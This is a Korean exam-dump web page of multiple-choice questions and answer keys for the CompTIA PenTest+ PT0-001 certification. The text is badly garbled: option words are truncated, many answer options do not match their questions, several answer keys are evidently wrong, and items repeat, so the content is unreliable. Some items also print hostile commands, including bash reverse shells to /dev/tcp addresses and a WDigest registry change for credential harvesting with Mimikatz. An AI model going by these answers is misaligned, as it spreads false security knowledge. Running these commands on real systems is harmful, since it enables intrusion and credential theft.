아무것도 놓치고 싶지 않으신가요?

인증 시험 합격 팁

최신 시험 소식 및 할인 정보

전문가가 선별하고 최신 정보를 제공합니다.

예, 뉴스레터를 보내주세요

업데이트 된 CompTIA PenTest+ PT0-001 시험 덤프 - 성공으로 가는 길

고품질의 연습 문제와 학습 자료로 CompTIA PenTest+ PT0-001 시험에 대비하는 것은 성공적인 합격을 위해 매우 중요합니다. 실제 시험 환경을 정확하게 반영하는 신뢰할 수 있는 시험 자료를 활용하면 추가 학습이 필요한 영역을 파악하는 데 도움이 될 수 있습니다. 실제 시험 형식과 난이도를 시뮬레이션하는 모의고사를 통해 자신의 준비도를 측정할 수 있습니다. 잘 만들어진 시험 문제와 답은 다양한 모의 침투 테스트 및 취약점 관리 주제를 다루고 있어 지식을 강화할 수 있습니다. 또한, 평판이 좋은 제공업체의 학습 가이드와 모의고사를 활용하면 관련성 있는 최신 시험 내용에 집중할 수 있습니다. 종합적인 시험 준비 리소스로 적절히 준비하면, CompTIA PenTest+ PT0-001 인증 시험에 자신 있게 도전할 수 있는 가능성이 높아집니다.
다른 온라인 시험에 응시하세요

질문 #1
모의 침투 테스터는 웹 애플리케이션의 스캔 결과를 검토합니다. 다음 중 가장 중요하며 익스플로잇에 우선순위를 두어야 하는 취약점은 무엇인가요?
A. 장된 XSS
B. 우기 경로 공개
C. 료된 인증서
D. 릭재킹
답변 보기
정답: A
질문 #2
내부 네트워크 침투 테스트 중에 테스터가 여러 대상 시스템에 대한 전체 관리자 권한이 있는 것으로 알려진 사용자의 NTLM 암호 해시를 복구합니다. 해시를 해독하고 일반 텍스트 암호를 복구하려는 노력은 실패했습니다.다음 중 지속적인 익스플로잇 노력에 가장 적합한 대상은 어느 것입니까?
A. 운영 체제: Windows 7 개방형 포트: 23, 161
B. 운영 체제: Windows Server 2016 개방형 포트: 53, 5900
C. 운영 체제: Windows 8
D. 운영 체제: Windows 8 개방형 포트: 514, 3389
답변 보기
정답: C
질문 #3
침투 테스터는 단일 워크스테이션을 손상시킨 후 최소한의 장애물로 도메인 전체를 가로질러 이동할 수 있습니다. 다음 중 보고서에서 가장 추천할 만한 방어 전략은 무엇인가요? (3개 선택).
A. 리덴셜 덤프 공격
B. LL 인젝션 공격
C. 버스 쉘 공격
D. 시 공격 통과
답변 보기
정답: CDE
질문 #4
내부 모의 침투 테스트 중에 여러 멀티캐스트 및 브로드캐스트 이름 확인 요청이 네트워크를 통과하는 것이 관찰되었습니다. 다음 중 네트워크 리소스를 가장하여 인증 요청을 수집하는 데 사용할 수 있는 도구는 무엇인가요?
A. ttercap
B. cpdump
C. 답자
D. 두사
답변 보기
정답: C
질문 #5
소프트웨어 개발자가 애플리케이션의 코드에 취약점이 있는지 테스트하려고 합니다. 다음 중 소프트웨어 개발자가 수행해야 하는 프로세스는 무엇인가요?
A. 약점 검사
B. 적 스캔
C. 적 스캔
D. 정 준수 검사
답변 보기
정답: A
질문 #6
모의 침투 테스트 중에 테스터가 피싱 캠페인을 실행하고 Windows 10 OS를 실행하는 내부 PC에서 셸을 수신합니다. 테스터는 Mimikatz를 사용하여 인증 정보 수집을 수행하려고 합니다. 다음 중 메모리에서 인증 정보 캐싱을 허용하는 레지스트리 변경은 무엇입니까?
A. eg 추가 HKLM\\System\\ControlSet002\\Control\\SecurityProviders\\WDigest /v userLogoCredential /t REG_DWORD /d 0
B. eg 추가 HKCU\\시스템\\현재제어설정\\제어\\보안공급자\\W다이제스트 /v 사용자 로고 자격 증명 /t REG_DWORD /d 1
C. eg 추가 HKLM\\소프트웨어\\CurrentControlSet\\제어\\보안 공급자\\WDigest /v 사용자 로고 자격 증명 /t REG_DWORD /d 1
D. eg 추가 HKLM\\시스템\\현재제어설정\\제어\\보안 공급자\\W다이제스트 /v 사용자 로고 자격 증명 /t REG_DWORD /d 1
답변 보기
정답: A
질문 #7
모의 침투 테스터가 REST 기반 웹 서비스에 대한 모의 침투 테스트를 수행해 달라는 요청을 받았습니다. 다음 중 필요한 항목은 무엇인가요?
A. 신 취약점 검사 결과
B. 플 애플리케이션 요청 목록
C. 능한 익스플로잇의 최신 목록
D. 플 테스트 계정 목록
답변 보기
정답: B
질문 #8
침투 테스터가 다음 명령을 실행합니다.다음 중 공격자가 악용하고 있는 로컬 호스트 취약점은 무엇입니까?
A. 전하지 않은 파일 권한
B. 플리케이션 화이트리스트
C. hell 이스케이프
D. 기 가능한 서비스
답변 보기
정답: A
질문 #9
모의 침투 테스터가 네트워크에서 SSH를 스캔하고 있으며 제공된 대상 목록을 가지고 있습니다. 다음 중 테스터가 사용해야 하는 Nmap 명령은 무엇인가요?
A. nmap -p 22 -iL 대상
B. nmap -p 22 -sL 대상
C. nmap -p 22 -oG 대상
D. nmap -p 22 -oA 대상
답변 보기
정답: A
질문 #10
웹 애플리케이션에 대한 모의 침투 테스트를 수행 중인 엔지니어가 필드 데이터에서 전송되는 사용자 로그인 프로세스가 HTTP GET 메서드를 사용하는 것을 발견합니다. 민감한 정보가 노출될 위험을 줄이려면 양식을 전송할 때
A. TTP POST 메서드
B. TTP OPTIONS 메서드
C. TTP PUT 메서드
D. TTP TRACE 메서드
답변 보기
정답: A
질문 #11
보안 분석가가 웹 애플리케이션의 로그에서 의심스러운 요청을 발견했습니다. 다음 URL이 주어졌을 때 다음 중 다음 공격 유형 중 취약점일 가능성이 가장 높은 것은 무엇인가요?
A. 범위 크립
B. 후 검토
C. 험 수용
D. 협 예방
답변 보기
정답: B
질문 #12
공격자가 SET를 사용하여 회사의 클라우드 호스팅 웹 메일 포털의 복사본을 만든 후 최고 경영자(CEO)가 로그인하여 CEO의 로그인 자격 증명을 얻기를 희망하는 이메일을 보냅니다. 다음 중 어느 유형의 공격의 예시인가요?
A. 유도 공격
B. 칭 공격
C. 피어 피싱 공격
D. 라이브 바이 다운로드 공격
답변 보기
정답: A
질문 #13
Corp.local 도메인에 대한 네트워크 침투 테스트의 정보 수집 단계에서 도메인 컨트롤러 목록을 제공하는 명령은 다음 중 어느 것인가?
A. slookup -type=srv _ldap
B. map -sV -p 389 - -script=ldap-rootdse corp
C. et 그룹 "도메인 컨트롤러" /domain
D. presult /d corp
답변 보기
정답: A
질문 #14
한 회사에서 외부 IP가 100.170.60.5인 새 VPN 집중 장치 설치에 취약점이 있는지 확인하기 위해 침투 테스터를 고용합니다. 다음 중 VPN을 사용할 수 있는지 테스트하는 명령은 무엇인가요?
A. pipe
B. ke-scan -A -t 1 --sourceip=spoof_ip 100
C. map -sS -A -f 100
D. c 100
답변 보기
정답: B
질문 #15
전시 버튼을 클릭합니다. 네트워크 관리자가 네트워크에서 문제를 일으키는 패킷 샘플을 테스터에게 보여주면 모의 침투 테스터가 평가를 수행 중입니다. 다음 중 테스터가 차단해야 하는 공격 유형은 무엇인가요?
A. NMP 무차별 대입
B. RP 스푸핑
C. NS 캐시 중독
D. MTP 릴레이
답변 보기
정답: A
질문 #16
공격자 조는 피해자의 계좌에서 자신의 계좌로 은밀하게 자금을 이체하려고 합니다. 다음 중 조가 이 공격을 수행하기 위해 사용할 수 있는 URL은 무엇인가요?
A. ttps://testbank
B. ttps://testbank
C. ttps://testbank
D. ttps://testbank
답변 보기
정답: B
질문 #17
다음과 유사한 비밀번호 해시를 보안 컨설턴트가 발견한 경우: b117525b345470c29ca3d8ae0b556ba8다음 중 올바른 해시 형식은 무엇인가요?
A. Kerberos
B. NetNTLMv1
C. NTLM
D. SHA-1
답변 보기
정답: D
질문 #18
모의 침투 테스터가 시스템에 "고스트" 취약점이 존재하는지 수동으로 확인하려고 합니다. 다음 중 취약점을 검증하는 올바른 방법은 무엇인가요?
A. 눅스 시스템에 GHOST 파일을 다운로드하고 컴파일gcc -o GHOSTtest i:
B. HOST 파일을 Windows 시스템에 다운로드하고 컴파일gcc -o GHOST GHOST
C. 눅스 시스템에 GHOST 파일을 다운로드하고 컴파일gcc -o GHOST GHOST
D. HOST 파일을 Windows 시스템에 다운로드하고 컴파일gcc -o GHOSTtest i:
답변 보기
정답: C
질문 #19
모의 침투 테스트자가 웹 애플리케이션 모의 침투 테스트 중에 콘텐츠 보안 정책 헤더가 누락된 것을 발견했습니다. 다음 중 모의 침투 테스터가 수행할 가능성이 가장 높은 기법은 무엇인가요?
A. 령어 인젝션 공격
B. 릭재킹 공격
C. 렉토리 트래버스 공격
D. 격 파일 포함 공격
답변 보기
정답: B
질문 #20
익스플로잇 후 테스터는 시스템 바이너리만 송신 필터를 통과하고 다음 명령을 사용하여 파일을 저장하는 것을 확인합니다: \creditcards.db>c:\winit\system32\calc.exe:creditcards.db이 명령이 이용하는 파일 시스템 취약점은 다음 중 어느 것입니까?
A. 층적 파일 시스템
B. 체 데이터 스트림
C. 도어 성공
D. 장 파일 시스템
답변 보기
정답: B
질문 #21
모의 침투 테스터가 네트워크에서 SSH를 스캔하고 있으며 제공된 대상 목록을 가지고 있습니다. 다음 중 테스터가 사용해야 하는 Nmap 명령은 무엇인가요?
A. map -p 22 -iL 대상
B. map -p 22 -sL 대상
C. map -p 22 -oG 대상
D. map -p 22 -oA 대상
답변 보기
정답: A
질문 #22
모의 침투 테스터가 몇 가지 기본 수학 오류가 지속되는 이유를 확인하기 위해 스크립트를 확인하고 있습니다. 예상 결과는 프로그램이 "True"를 출력하는 것이었습니다.위의 콘솔의 출력이 주어졌을 때 다음 중 스크립트에서 오류를 수정하는 방법을 설명하는 것은? (두 개를 선택하세요.)
A. OW
B. DA
C. ULA
D. PA
답변 보기
정답: BD
질문 #23
제한된 권한으로 Windows 시스템에서 지속성을 유지하려고 할 때 테스터가 사용해야 하는 레지스트리 키는 다음 중 어느 것인가요?
A. key_classes_root
B. key_local_machine
C. key_current_user
D. key_current_config
답변 보기
정답: C
질문 #24
다음 중 침투 테스터가 OSINT를 수행하기 위해 활용할 수 있는 도구는 무엇입니까? (2가지 선택).
클라이언트의 A. AC 주소
도메인 컨트롤러의 B. AC 주소
웹 서버의 C. AC 주소
게이트웨이의 D. AC 주소
답변 보기
정답: AE
질문 #25
모의 침투 테스터가 IP 10.0.0.20의 원격으로 손상된 호스트에서 그래픽 콘솔 창을 시작하고 IP 192.168.1.10의 로컬 컴퓨터에서 터미널을 표시하려고 합니다. 다음 중 이 작업을 수행할 수 있는 방법은?
A. 원격 컴퓨터에서 다음 명령을 실행합니다
B. 컬 컴퓨터에서 다음 명령을 실행합니다:ssh -L4444:127
C. 격 컴퓨터에서 다음 명령을 실행합니다:ssh -R6000:127
D. 컬 컴퓨터에서 다음 명령을 실행합니다
답변 보기
정답: A
질문 #26
다음 중 표적의 외부 도메인에서 수동 정찰을 수행하는 데 가장 적합한 것은 무엇입니까?
A. each
B. eWL
C. penVAS
D. 단
답변 보기
정답: D
질문 #27
다음 중 스피어 피싱 공격의 예는 무엇인가요?
A. 플 SOAP 메시지
B. EST API 문서
C. 프로토콜 퍼징 유틸리티
D. 당 XSD 파일
답변 보기
정답: A
질문 #28
다음 중 침투 테스트를 수행할 때 확인된 결과를 기밀로 유지하는 것이 중요한 이유를 가장 잘 설명하는 것은?
A. 모의 침투 테스트 결과에는 종종 회사의 지적 재산이 포함되어 있습니다
B. 침투 테스트 결과가 공개될 경우 소비자 불만을 초래할 수 있습니다
C. 의 침투 테스트 결과는 기밀 정보가 포함된 법적 문서입니다
D. 의 침투 테스트 결과는 공격자가 시스템을 손상시키는 데 도움이 될 수 있습니다
답변 보기
정답: D
질문 #29
전체 범위 보안 평가 중에 대상을 물리적으로 교전하여 소셜 엔지니어링하기 위한 전제 조건은 다음 중 어느 것인가요?
A. 상구 찾기
B. 실 준비
C. 해자의 숄더 서핑
D. 해자 미행
답변 보기
정답: B
질문 #30
한 회사가 웹 애플리케이션 모의 침투 테스트를 수행하기 위해 컨설턴트를 고용할 계획을 세우고 예산을 확보했습니다. 취약점을 발견하자 회사는 컨설턴트에게 다음 작업을 수행하도록 요청했습니다.-코드 검토-방화벽 설정 업데이트다음 중 이 상황에서 발생한 것은 무엇입니까?
A. 비스 열거
B. SINT 모임
C. 트 스캔
D. 회 공학
답변 보기
정답: A
질문 #31
침투 테스터가 컴퓨터에서 다음 Nmap 스캔을 실행했습니다:nmap -aV 192.168.1.5조직은 해당 환경에서 텔넷을 비활성화했다고 말했습니다. 그러나 Nmap 스캔 결과에 따르면 포트 22는 닫혀 있고 포트 23은 SSH에 열려 있는 것으로 나타났습니다. 다음 중 이 상황을 가장 잘 설명하는 것은 무엇인가요?
A. 조직에서 텔넷을 비활성화하지 못했습니다
B. map 결과에는 포트 23에 대한 오탐이 포함되어 있습니다
C. 트 22가 필터링되었습니다
D. 서비스가 비표준 포트에서 실행 중입니다
답변 보기
정답: A
질문 #32
다음 중 침투 테스트 참여 계약의 속성 중 가장 높은 부하에서 프로덕션 시스템을 관찰하고 테스트하는 데 가장 큰 영향을 미치는 것은?
A. 중요 프로덕션 시스템 범위 만들기
B. 스트 접속 시간 일정 설정하기
C. 이트박스 테스트 참여 설정하기
D. 침입 테스트에 대한 경영진의 승인 받기
답변 보기
정답: B
질문 #33
모의 침투 테스트자가 이블 트윈을 성공적으로 배포하고 일부 피해자 트래픽을 확인하기 시작했습니다. 모의 침투 테스터가 수행하려는 다음 단계는 모든 피해 웹 트래픽을 암호화되지 않은 상태로 캡처하는 것입니다. 다음 중 이 목표를 가장 잘 달성할 수 있는 방법은 무엇인가요?
A. TTP 다운그레이드 공격을 수행합니다
B. 트래픽을 해독하기 위해 사용자 자격 증명을 수집합니다
C. ITM 공격을 수행합니다
D. 뢰할 수 있는 CA를 사칭하여 CA 공격을 실행합니다
답변 보기
정답: A
질문 #34
다음 중 전기 유틸리티 시설, 천연 가스 시설, 댐 및 원자력 시설에서 사용되는 ICS의 중요한 보안 취약점을 가장 잘 설명하는 것은?
A. CS 공급업체는 적절한 보안 제어를 구현하는 속도가 느립니다
B. CS 직원은 기본 업무를 수행할 수 있는 적절한 교육을 받지 못했습니다
C. 요 기기에 대한 교체 장비가 부족합니다
D. CS 시설에 대한 규정 준수가 부족합니다
답변 보기
정답: B
질문 #35
모의 침투 테스터가 중요한 데이터베이스가 포함된 특정 호스트의 취약점 스캔을 수행한 결과 다음 취약점을 확인했습니다.-XSS-HTTP 삭제 방법 허용-SQL 인젝션- CSR에 취약 다음 중 가장 높은 우선순위를 부여해야 하는 것은 무엇인가요?
A. QL 주입
B. TTP DELETE 메서드 허용
C. SRF에 취약함
D. SS
답변 보기
정답: B
질문 #36
모의 침투 테스터가 다양한 IP 주소에 대한 모든 RPTR 레코드를 검색하는 방법을 스크립트로 작성하려고 합니다. 다음 중 가장 효율적으로 활용할 수 있는 방법은 무엇인가요?
A. map -p 53 -oG dnslist
B. slookup -ns 8
C. or x in {1
D. ig -r > echo "8
답변 보기
정답: A
질문 #37
다음 중 위의 공격을 가장 잘 설명하는 것은 무엇인가요:http://example.com/download.php?id-.../.../.../etc/passwdWhich?
A. 성 파일 업로드 공격
B. 디렉션 공격
C. 렉토리 트래버스 공격
D. 전하지 않은 직접 객체 참조 공격
답변 보기
정답: C
질문 #38
웹 애플리케이션을 평가하는 동안 모의 침투 테스터는 서버에서 임의의 명령이 실행될 수 있음을 발견합니다. 이 공격을 한 단계 더 발전시키고 싶었던 모의 침투 테스터는 192.168.1.5에서 공격 머신으로 리버스 셸을 되찾을 수 있는 방법을 모색하기 시작합니다. 다음 중 가능한 방법은 무엇인가요? (2가지 선택).
A. IoT 디바이스를 개발하는 제조업체는 보안에 대한 우려가 적습니다
B. 관리자가 전반적으로 동일한 보안 표준을 구현하는 것은 어렵습니다
C. oT 시스템에는 보다 안전한 솔루션에 필요한 하드웨어 성능이 부족한 경우가 많습니다
D. 제 당국은 IoT 시스템에 대한 보안 요구 사항이 낮은 경우가 많습니다
답변 보기
정답: BC
질문 #39
다음 중 침투 테스터가 고객의 접점 정보를 항상 사용할 수 있어야 하는 이유는 무엇인가요? (세 가지를 선택하세요.)
A. SASS
B. AM 데이터베이스
C. ctive Directory
D. 지스트리
답변 보기
정답: ACF
질문 #40
침투 테스터가 Windows 서버를 손상시키고 지속성을 확보하려고 시도하고 있습니다. 다음 중 이 목표를 달성할 수 있는 방법은 무엇인가요?
A. chtasks
B. et 세션 서버 | dsquery -user | net 사용 c$
C. owershell && set-executionpolicy 제한 없음
D. eg 저장 HKLM\\System\\CurrentControlSet\\Services\\Sv
답변 보기
정답: D
질문 #41
모의 침투 테스터가 운영에 대한 전반적인 위험 수준을 설명하는 보고서를 작성하는 중입니다. 침투 테스터는 다음 중 보고서의 어느 영역에 이 내용을 넣어야 하나요?
A. 권한을 수평적으로 에스컬레이션합니다
B. 페이지를 스크랩하여 숨겨진 필드를 찾습니다
C. TTP 응답 코드를 분석합니다
D. TTP 헤더를 검색합니다
답변 보기
정답: B
질문 #42
다음 중 악용된 취약점이 실행 중인 여러 애플리케이션 컨테이너에 한 번에 영향을 미칠 가능성이 가장 높은 구성 요소는 무엇인가요?
A. 공용 라이브러리
B. 성 파일
C. 드박스 탈출
D. SLR 바이패스
답변 보기
정답: A
질문 #43
한 회사에서 자체 개발한 안드로이드 애플리케이션의 보안을 검토하기 위해 모의 침투 테스터를 요청했습니다. 모의 침투 테스터는 평가를 지원하기 위해 APK 파일을 받았습니다. 모의 침투 테스터는 APK 파일에서 SAST를 실행하려고 합니다. 모의 침투 테스터가 먼저 수행해야 하는 준비 단계는 다음 중 어느 것입니까? (두 개 선택).
A. 래된 소프트웨어에는 악용 가능한 구성 요소가 포함되어 있을 수 있습니다
B. 약한 비밀번호 관리 관행이 사용될 수 있습니다
C. 호학적으로 취약한 프로토콜은 가로챌 수 있습니다
D. 서버 구성으로 인해 민감한 정보가 노출될 수 있습니다
답변 보기
정답: AB
질문 #44
침투 테스터가 무선 스니퍼의 다음 출력을 검토하고 있습니다:위의 정보로부터 추정할 수 있는 것은 다음 중 어느 것입니까?
A. 려움의 원리
B. 한의 원칙
C. 소성의 원리
D. 사성의 원칙
E. 회적 증명의 원칙
답변 보기
정답: C
질문 #45
모의 침투 테스터가 손상된 'python -c 'import pty;pty.spawn ("/bin/bash")'에서 다음을 실행합니다.다음 중 테스터가 수행하는 작업은 어느 것입니까?
A. ash 기록 제거하기
B. 업그레이드
C. 드박스 만들기
D. 격 증명 캡처
답변 보기
정답: B
질문 #46
고객이 모의 침투 테스터에게 최근 해고된 헬프 데스크 기술자를 모방해 달라고 요청합니다. 다음 중 위협 행위자의 능력을 가장 잘 설명하는 것은 무엇인가요?
A. 능형 지속적 위협
B. cript 키디
C. 티비스트
D. 직 범죄
답변 보기
정답: B
질문 #47
최고 경영자(CEO)가 최고 재무 책임자(CFO)에게 보낸 이메일에 새로운 공급업체에 대금을 지불하기 위해 전신 송금이 필요하다는 내용이 포함되어 있습니다. 두 사람 모두 해당 공급업체를 알지 못하며 CEO는 이메일을 보낸 사실을 부인합니다.이 공격에 사용된 동기 유형은 다음 중 어느 것입니까?
A. 웹 서버 암호화 구성을 수정하여 암호화, 해싱 및 디지털 서명에 더 강력한 암호 제품군을 사용하도록 합니다
B. 애플리케이션 접속 시 위험성을 인지할 수 있도록 새로운 교육을 실시합니다
C. 애플리케이션에 대한 액세스를 재무 부서로만 제한하는 ACL을 구현합니다
D. 급여 사용자에게 애플리케이션 인증에 사용되는 비밀번호를 변경하도록 요구하세요
답변 보기
정답: B
질문 #48
테스터가 대상 시스템에서 다음 명령을 실행하려고 합니다:bash -i >& /dev/tcp/10.2.4.6/443 0> &1이전 명령이 성공하려면 테스터의 Linux 시스템에서 다음 중 어떤 명령을 추가로 실행해야 하나요?
A. c -nlvp 443
B. c 10
C. c -w3 10
D. c -e /bin/sh 10
답변 보기
정답: D
질문 #49
보안 컨설턴트가 다가오는 모의 침투 테스트의 범위를 설명하는 문서를 받습니다. 이 문서에는 각각 스캔할 수 있는 IP 주소와 시간이 포함되어 있습니다. 다음 중 이 정보가 포함될 수 있는 것은 무엇인가요?
A. 여 규칙
B. 안 요청
C. 스터 서비스 계약
D. 즈니스 영향 분석
답변 보기
정답: A
질문 #50
다음 명령이 Linux 파일 시스템에서 실행됩니다.chmod 4111 /usr/bin/sudo다음 중 현재 악용될 수 있는 문제는 무엇인가요?
A. 널 취약점
B. 티커 비트
C. 옴표로 묶지 않은 서비스 경로
D. 못 구성된 sudo
답변 보기
정답: B
질문 #51
다음과 유사한 비밀번호 해시를 보안 컨설턴트가 발견한 경우: b117525b345470c29ca3d8ae0b556ba8다음 중 올바른 해시 형식은 무엇인가요?
A. erberos
B. etNTLMv1
C. TLM
D. HA-1
답변 보기
정답: D
질문 #52
익스플로잇된 머신의 기록 파일에서 다음 줄이 발견되었습니다. 공격자가 다음 명령을 실행했습니다:bash -i >& /dev/tcp/192.168.0.1/80 0> &1다음 중 이 명령의 기능을 설명하는 것은 무엇인가요?
A. 금 피킹
B. 그레스 센서 트리거
C. 금 범핑
D. ock 바이패스
답변 보기
정답: C
질문 #53
보안 요원이 배지를 스캔한 후 건물에 들어오는 개인을 관찰합니다. 이 시설에는 개찰구가 있는 엄격한 배지 체크인 및 배지 체크아웃 요건이 있으며, 경비원이 배지 시스템을 감사한 결과 지난 30분 이내에 해당 배지에 대한 로그 항목 두 개를 발견했습니다. 다음 중 가장 가능성이 높은 것은 무엇인가요?
A. 배지가 복제되었습니다
B. 물리적 액세스 제어 서버가 오작동 중입니다
C. 시스템이 크로스오버 오류율에 도달했습니다
D. 직원이 배지를 분실했습니다
답변 보기
정답: A
질문 #54
모의 침투 테스터가 API 테스트를 준비 중입니다. 다음 중 이 참여를 준비하는 데 가장 도움이 될 만한 것은 무엇인가요?
A. 닛토
B. WAR
C. W3AF
D. Swagger
답변 보기
정답: D
질문 #55
침투 테스터가 도메인 컨트롤러에 대한 전체 셸을 가지고 있으며 21일 동안 도메인에 인증되지 않은 모든 사용자 계정을 찾으려고 합니다. 다음 중 이 작업을 가장 잘 수행할 수 있는 명령은 무엇인가요?
A. dsrm -users ?€DN=company
B. dsuser -name -계정 -한도 3
C. dsquery 사용자 -비활성 3
D. dsquery -o -rdn -limit 21
답변 보기
정답: D
질문 #56
물리적 모의 침투 테스트 시나리오에서 모의 침투 테스터가 노트북에 물리적으로 접근합니다. 노트북은 로그인되어 있지만 잠겨 있습니다. 다음 중 장치에서 자격 증명을 추출하기 위한 잠재적인 다음 단계는 무엇인가요?
A. 사용자의 비밀번호를 무차별 대입합니다
B. ARP 스푸핑 공격을 수행합니다
C. eEF 프레임워크를 활용하여 자격 증명을 캡처합니다
D. LMNR/NETBIOS-ns 중독을 수행합니다
답변 보기
정답: A
질문 #57
물리적 모의 침투 테스트 시나리오에서 모의 침투 테스터가 노트북에 물리적으로 접근합니다. 노트북은 로그인되어 있지만 잠겨 있습니다. 다음 중 장치에서 자격 증명을 추출하기 위한 잠재적인 다음 단계는 무엇인가요?
A. 사용자의 비밀번호를 무차별 대입합니다
B. ARP 스푸핑 공격을 수행합니다
C. BeEF 프레임워크를 활용하여 자격 증명을 캡처합니다
D. LLMNR/NETBIOS-ns 중독을 실시합니다
답변 보기
정답: A
질문 #58
모의 침투 테스터는 포트 443을 통해 모든 호스트에 무제한으로 네트워크에 액세스할 수 있는 시스템을 손상시킵니다. 모의 침투 테스터는 피해자로부터 공격자로 역방향 셸을 생성하려고 합니다. 다음 중 모의 침투 테스터가 사용할 가능성이 가장 높은 방법은 무엇인가요?
A. erl -e 'use SOCKET'; $i='; $p='443;
B. sh superadmin@-p 443
C. c -e /bin/sh443
D. ash -i >& /dev/tcp//443 0>&1
답변 보기
정답: D
질문 #59
다음 중 모의 침투 테스트가 끝날 때 침투 테스터가 chkconfig --del servicename 명령을 실행하는 이유는 무엇인가요?
A. rpspoof
B. map
C. 답자
D. urpsuite
답변 보기
정답: A
질문 #60
다음 중 모의 침투 테스터가 테스트 도중 시스템 소유자/클라이언트와 통신하게 되는 상황은 무엇입니까? (2가지 선택)?
A. 중요한 취약점에 대한 손쉬운 보완 제어를 적용하여 위험을 최소화한 다음 해결 우선순위를 다시 정합니다
B. 가장 빠르게 해결할 수 있는 문제를 파악하여 먼저 해결합니다
C. 요 취약점 중 영향이 가장 적은 취약점부터 먼저 개선한 후 다른 중요 취약점을 해결합니다
D. 다른 취약점을 수정하는 데 시간이 오래 걸리더라도 가장 중요한 취약점을 먼저 수정하세요
답변 보기
정답: BD
질문 #61
핫스팟지침:다음 공격 시그니처가 주어지면 공격 유형을 파악한 다음 향후 공격을 방지하기 위해 관련 해결 방법을 파악하세요.언제든지 시뮬레이션의 초기 상태로 되돌리려면 모두 재설정 버튼을 클릭하세요.귀하는 웹 서버를 강화하는 작업을 맡은 보안 분석가입니다.악성으로 플래그가 지정된 HTTP 페이로드 목록을 받았습니다.핫 영역입니다:
A. 답변은 설명 섹션을 참조하세요
답변 보기
정답: A
질문 #62
보안 요원이 배지를 스캔한 후 건물에 들어오는 사람을 관찰합니다. 이 시설에는 개찰구가 있는 엄격한 배지 체크인 및 배지 체크아웃 요건이 있습니다. 경비원이 배지 시스템을 감사한 결과 지난 30분 동안 해당 배지에 대한 로그 항목 두 개를 발견했습니다. 다음 중 가장 가능성이 높은 것은 무엇인가요?
A. 배지가 복제되었습니다
B. 리적 액세스 제어 서버가 오작동 중입니다
C. 시스템이 크로스오버 오류율에 도달했습니다
D. 직원이 배지를 분실했습니다
답변 보기
정답: A
질문 #63
다음 중 침투 테스트자가 메타스플로잇에서 인터넷에서 사설 네트워크에 액세스할 수 있는 명령은?
A. et rhost 192
B. un autoroute -s 192
C. b_nmap -iL /tmp/privatehosts
D. 용 보조/서버/양말4a
답변 보기
정답: A
질문 #64
다음 중 NDA의 목적은 무엇인가요?
A. 양 당사자 간의 기밀 유지 조건에 대해 설명합니다
B. 테스트가 승인된 시스템의 경계에 대해 설명합니다
C. 허용되는 기술 테스트의 요구 사항 개요
D. 트워크의 세부 구성에 대해 설명합니다
답변 보기
정답: A
질문 #65
클라이언트 네트워크에 있지 않은 모의 침투 테스터가 Nmap을 사용하여 네트워크에서 범위 내에 있는 호스트를 스캔하고 있습니다. 침투 테스터가 다음 명령에 대한 응답을 받지 못합니다:nmap 100.100/1/0-125다음 중 결과를 반환하는 데 가장 적합한 명령은 무엇인가요?
A. map -Pn -sT 100
B. map -sF -p 100
C. map -sV -oA 출력 100
D. map 100
답변 보기
정답: A
질문 #66
다음 Python 스크립트가 주어졌을 때 다음 중 출력이 출력되는 위치는 어디일까요?
A. 화면으로
B. 네트워크 서버로
C. 일로
D. o /dev/null
답변 보기
정답: C
질문 #67
고객이 모의 침투 테스터에게 새로운 웹 애플리케이션의 가용성을 평가해 달라고 요청하고 있습니다. 다음 중 테스터가 사용해야 하는 공격 유형은 무엇인가요?
A. CP SYN 폭주
B. QL 주입
C. SS
D. MAS 스캔
답변 보기
정답: B
질문 #68
다음 중 표적의 외부 도메인에서 수동 정찰을 수행하는 데 가장 적합한 것은 무엇입니까?
A. 복숭아
B. CeWL
C. OpenVAS
D. 쇼단
답변 보기
정답: D
질문 #69
간단한 버퍼 오버플로를 악용하기 위해 침투 테스터가 덮어써야 하는 CPU 레지스터는 다음 중 어느 것입니까?
A. 택 포인터 레지스터
B. 덱스 포인터 레지스터
C. 택 베이스 포인터
D. 상 인덱스 레지스터
답변 보기
정답: A

제출 후 답변 보기

질문에 대한 답변을 얻으려면 이메일과 WhatsApp을 제출하세요.

참고: 올바른 시험 결과를 얻을 수 있도록 이메일 ID와 Whatsapp이 유효한지 확인하십시오.

이메일:
WhatsApp/전화번호: